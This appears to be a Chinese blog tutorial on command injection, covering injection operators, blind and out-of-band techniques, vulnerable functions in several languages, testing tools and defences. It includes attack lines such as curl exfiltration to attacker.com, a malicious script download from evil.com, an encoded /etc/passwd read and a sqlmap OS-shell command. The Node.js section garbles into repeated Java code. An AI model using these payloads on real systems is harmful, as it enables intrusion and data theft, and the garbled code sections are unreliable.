一、漏洞原理与攻击类型
1. 基础命令注入
攻击者通过拼接符号直接追加恶意命令:
# 常见拼接符号
; # 顺序执行多条命令(Linux/Windows)
&& # 前一条成功则执行下一条
|| # 前一条失败则执行下一条
` ` # 反引号优先执行内部命令
$( ) # 等同于反引号(支持嵌套)
| # 管道符传递输出2. 进阶攻击形式
-
无回显盲注:通过时间延迟判断执行结果
-
ping -c 4 127.0.0.1 && sleep 10 # 若响应延迟10秒,说明命令执行成功 -
带外攻击(OOB):利用DNS/HTTP请求外传数据
-
curl http://attacker.com/$(whoami|base64)编码绕过:应对基础过滤机制
-
# Base64编码绕过 echo 'cat /etc/passwd' | base64 -> Y2F0IC9ldGMvcGFzc3dkCg== $(echo "Y2F0IC9ldGMvcGFzc3dkCg==" | base64 -d) # Hex编码示例 php -r "system(\x65\x63\x68\x6f\x20\x68\x61\x63\x6b\x65\x64);"
二、多语言高危函数全览
1. PHP
system("$_GET[cmd]");
exec($_POST['command'], $output);
popen('dig '.$user_input, 'r');
proc_open($_COOKIE['cmd'], $descriptors, $pipes);2. Python
os.system(f"nslookup {user_input}")
subprocess.call(request.args.get('cmd'), shell=True)
os.popen('ping ' + untrusted_data)3. Java
Runtime.getRuntime().exec("shutdown /s /t 0 " + request.getParameter("time"));
ProcessBuilder pb = new ProcessBuilder("cmd", "/C", userControlledString);4. Node.js
javascript
Runtime.getRuntime().exec("shutdown /s /t 0 " + request.getParameter("time"));
ProcessBuilder pb = new ProcessBuilder("cmd", "/C", userControlledString);三、漏洞检测方法论
1. 手工测试技巧
| 测试类型 | 输入样例 | 预期效果 | |
|---|---|---|---|
| 基础注入测试 | 127.0.0.1; id | 返回当前用户信息 | |
| 盲注检测 | example.com && sleep 5 | 观察响应延迟 | |
| 环境变量泄露 | ; env | 获取服务器环境变量 | |
| 文件操作测试 | ` | curl http://evil.com/1.sh -o /tmp/1.sh` | 下载恶意文件 |
2. 自动化工具
-
Burp Suite:
使用Intruder模块爆破注入点,预置命令注入Payload列表 -
sqlmap:
sqlmap -u "http://example.com?ip=1.1.1.1" --os-shell -
Commix:
专用命令注入检测工具,支持多级渗透
3. 流量
python commix.py -u "http://target.com/?id=1"特征分析
恶意请求通常包含:
-
非标准ASCII字符(
%0a换行符、%24$符号) -
敏感命令关键字(
/etc/passwd、whoami) -
异常参数长度(超长base64字符串)
四、企业级防御体系
1. 输入验证的三层模型
+----------------+
| 业务白名单 | <--- 最严格:只允许已知安全字符
+----------------+
↓
+----------------+
| 危险字符过滤 | <--- 过滤 & | ; 等符号
+----------------+
↓
+----------------+
| 内容签名校验 | <--- 对关键参数进行HMAC签名
+----------------+
2. 安全函数封装示例(PHP)
/**
* 安全执行命令函数
* @param string $command 基础命令(不含参数)
* @param array $args 参数数组(自动转义)
*/
function safe_exec(string $command, array $args) {
$escaped_args = array_map('escapeshellarg', $args);
$full_cmd = $command . ' ' . implode(' ', $escaped_args);
// 记录审计日志
syslog(LOG_INFO, "EXEC: $full_cmd");
// 使用proc_open限制执行权限
$descriptors = [
0 => ['pipe', 'r'], // stdin
1 => ['pipe', 'w'], // stdout
2 => ['pipe', 'w'] // stderr
];
$process = proc_open($full_cmd, $descriptors, $pipes);
if (!is_resource($process)) {
throw new Exception("Command execution failed");
}
// 获取输出
$output = stream_get_contents($pipes[1]);
$errors = stream_get_contents($pipes[2]);
// 关闭资源
foreach ($pipes as $pipe) fclose($pipe);
proc_close($process);
return ['output' => $output, 'errors' => $errors];
}
// 调用示例
safe_exec('/usr/bin/convert', ['-resize', '800x600', 'input.jpg', 'output.jpg']);3. 容器环境专项防护
dockerfile
# Dockerfile 安全实践
FROM gcr.io/distroless/base # 使用最小化基础镜像
RUN adduser --disabled-password appuser # 创建非root用户
USER appuser
COPY --chown=appuser:appuser ./app /app
# 设置文件系统只读
RUN chmod -R a-w /app && \
chmod o-rx /app
# 限制能力
docker run --cap-drop=ALL --cap-add=CHOWN ...五、经典漏洞案例分析
1. Equifax数据泄露(2017)
-
漏洞根源:Apache Struts OGNL表达式注入
-
攻击路径:
http
POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...} -
后果:1.43亿用户数据泄露,公司损失超40亿美元
2. 某云服务RCE事件(2022)
-
漏洞点:Kubernetes Dashboard未授权访问
-
攻击步骤:
-
通过未鉴权的
/api/v1/namespaces接口获取集群信息 -
创建恶意Pod挂载主机根目录
-
通过
kubectl exec执行宿主机命令
-
六、防御全景图
plaintext
[输入验证]
│
▼
[安全编码]◄──►[组件扫描]──►[运行时防护]──►[系统加固]
│ │ │ │
│ │ │ ▼
└────────►[CI/CD管道]◄───►[WAF]◄───►[容器安全]
七、延伸知识
操作系统差异
| 特性 | Linux/Unix | Windows | ||||
|---|---|---|---|---|---|---|
| 命令分隔符 | ; && ` | ` | & && ` | ` | ||
| 管道符 | ` | ` | ` | ` | ||
| 变量引用 | $VAR | %VAR% | ||||
| 常见危险命令 | sh bash curl | powershell cmd |
实战工具箱推荐:
-
SecLists:Payload字典集合
-
PayloadsAllTheThings:攻击技术大全
-
OWASP ZAP:自动化漏洞扫描
扫一扫
551
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
